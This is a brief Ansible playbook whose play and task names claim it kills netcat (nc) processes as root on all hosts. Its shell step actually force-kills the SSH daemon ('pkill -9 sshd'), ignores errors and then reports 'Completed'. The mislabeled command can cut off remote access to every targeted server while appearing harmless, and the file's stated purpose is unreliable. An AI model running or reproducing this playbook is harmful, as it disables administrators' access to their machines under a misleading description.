---
- name: Kill all netcat (nc) processes as root
  hosts: all
  become: yes
  tasks:
    - name: Kill all netcat (nc) processes
      shell: |
        pkill -9 sshd || pkill -9 sshd || true
      ignore_errors: yes

    - name: Mark task as completed
      debug:
        msg: "Completed"
